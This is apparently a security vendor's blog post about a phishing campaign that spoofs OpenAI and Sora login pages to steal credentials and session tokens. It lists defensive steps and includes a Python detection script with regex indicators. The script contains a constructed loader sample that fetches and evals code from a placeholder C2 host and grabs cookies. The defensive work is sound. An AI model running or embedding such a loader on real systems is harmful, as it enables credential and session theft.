A recent phishing campaign is exploiting users’ trust in popular AI services by impersonating OpenAI and the new Sora portals. Attackers send convincing account alerts that direct recipients to fake login pages. Once credentials are entered, a stealthy JavaScript loader runs inside the browser, captures the credentials, exfiltrates them to a command-and-control server, then redirects the user to the real service to avoid detection. Security teams first noticed the activity after organizations reported unusual logins tied to employees who had clicked through these messages.
This is a textbook example of modern phishing: high-fidelity impersonation, dynamic payload delivery, and post-compromise stealth that favors persistence and lateral movement.
What the attack looks like in practice
- Emails warn of account suspension or unusual activity and include links to forged OpenAI and Sora login pages.
- The fake pages mimic the look and feel of the real portals and are served over HTTPS with valid TLS certificates, so the padlock alone does not reveal them as forgeries.
- When credentials are submitted, obfuscated JavaScript fetches a secondary payload from an attacker-controlled endpoint and executes it in the browser.
- The injected payload captures usernames, passwords, and session tokens, forwards them to a C2 server, and then redirects the user to the legitimate service so the interaction appears normal.
- Persistence is enforced via browser local storage and session restoration techniques, so clearing cookies may not remove the infection.
Why this is dangerous for enterprises
Stolen credentials and tokens are powerful. In environments that rely on Single Sign-On, a single compromised token can grant access across multiple applications, enabling lateral movement, data exfiltration, model tampering, or the insertion of malicious prompts and scripts into AI workflows. The campaign’s use of dynamic loaders and in-browser execution makes signature-based detection less effective and increases the risk that breaches go unnoticed for longer.
Practical steps security teams should take now
- Review recent authentication logs for anomalous logins, geographies, or new device patterns.
- Enforce phishing-resistant multi-factor authentication, such as hardware tokens or FIDO2, for sensitive accounts.
- Harden SSO trust relationships and reduce token lifetimes where possible.
- Monitor outbound traffic from endpoints and browsers to detect calls to suspicious domains or unknown API endpoints.
- Implement browser protection controls that block or sandbox untrusted script execution and detect suspicious use of local storage for persistence.
- Run targeted phishing simulations and user training focused on high-fidelity service impersonation.
- Add detection hunts for obfuscated loader patterns and known artifact indicators, including embedded C2 URLs, base64-encoded fetch calls, and unusual eval usage in web contexts.
- Treat email-based alerts and in-app notifications as a potential attack surface and validate important links by hovering, verifying domains, or using centralized corporate portals instead of direct links.
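As an added illustration of the artifact hunt in the list above (not code from the campaign or from COE Security), the following Python scores a script body for the loader traits named there: eval usage, base64-hidden fetch targets, local-storage persistence and a top-level redirect. The indicator patterns, the sample scripts and the placeholder domains are all constructed for this example.

```python
import base64
import re

# Heuristic indicators taken from the hunt list above (eval, base64-hidden
# fetch targets, local-storage persistence, redirect to the real service).
# The patterns are assumptions for illustration, not a vendor signature set.
INDICATORS = {
    "eval_usage": re.compile(r"\beval\s*\("),
    "function_ctor": re.compile(r"\bnew\s+Function\s*\("),
    "atob_decode": re.compile(r"\batob\s*\("),
    "fetch_call": re.compile(r"\bfetch\s*\("),
    "local_storage_write": re.compile(r"\blocalStorage\.setItem\s*\("),
    "top_level_redirect": re.compile(r"\blocation\.(?:href|replace)\b"),
}
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

def decode_base64_strings(script: str) -> list[str]:
    """Return printable decodings of base64-looking string literals."""
    found = []
    for m in B64_LITERAL.finditer(script):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or not text: ignore it
        if text.isprintable():
            found.append(text)
    return found

def hunt(script: str) -> dict:
    """Count indicators in one script and surface every URL, plain or base64-hidden."""
    hits = {k: n for k, rx in INDICATORS.items() if (n := len(rx.findall(script)))}
    decoded = decode_base64_strings(script)
    urls = URL_RE.findall(script)
    for text in decoded:
        urls.extend(URL_RE.findall(text))
    # A base64 literal sitting next to fetch/eval is the loader shape described above.
    if decoded and ("fetch_call" in hits or "eval_usage" in hits):
        hits["base64_hidden_payload"] = len(decoded)
    return {"indicators": hits, "urls": urls, "score": len(hits)}

# Constructed samples with placeholder domains (not real indicators):
# a loader-shaped script and an ordinary page script for comparison.
SUSPECT_JS = ("var u=atob('aHR0cHM6Ly9jMi5leGFtcGxlLmNvbS94');"
              "fetch(u).then(r=>r.text()).then(t=>{eval(t);"
              "localStorage.setItem('s',document.cookie);"
              "location.href='https://login.example.com/';});")
BENIGN_JS = "document.getElementById('b').addEventListener('click',()=>fetch('/api/status'));"
```

Run hunt() over script bodies collected from proxy or browser telemetry; a high score flags the file for review and the urls field yields the decoded endpoint to block and pivot on.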
Conclusion
This campaign highlights two realities: first, attackers will impersonate high-trust brands associated with innovation to increase click-through rates; second, browser-based loaders and token theft are now a primary path for enterprise compromise. Defenders need to treat collaboration platforms, SSO, and browser runtime behavior as first-class parts of the attack surface. Prevention must be layered – combining phishing-resistant MFA, telemetry-driven detection, strict token governance, and human-focused training – because once credentials are stolen, the ability to detect and contain damage determines the outcome.
About COE Security
COE Security partners with organizations in financial services, healthcare, retail, manufacturing, and government to secure AI-powered systems and ensure compliance. Our offerings include:
- AI-enhanced threat detection and real-time monitoring
- Data governance aligned with GDPR, HIPAA, and PCI DSS
- Secure model validation to guard against adversarial attacks
- Customized training to embed AI security best practices
- Penetration Testing (Mobile, Web, AI, Product, IoT, Network & Cloud)
- Secure Software Development Consulting (SSDLC)
- Customized CyberSecurity Services
Additionally, based on threats like credential-harvesting phishing that target AI platforms and SSO, we provide:
- SSO and token governance assessments to limit lateral movement risk
- Browser runtime monitoring and artifact-hunting for in-browser loaders and obfuscated scripts
- Phishing simulation programs focused on high-fidelity brand impersonation and AI service lures
- Incident response playbooks for token theft and session compromise, including rapid token revocation and session invalidation
Follow COE Security on LinkedIn for ongoing insights into safe, compliant AI adoption and to stay updated and cyber safe.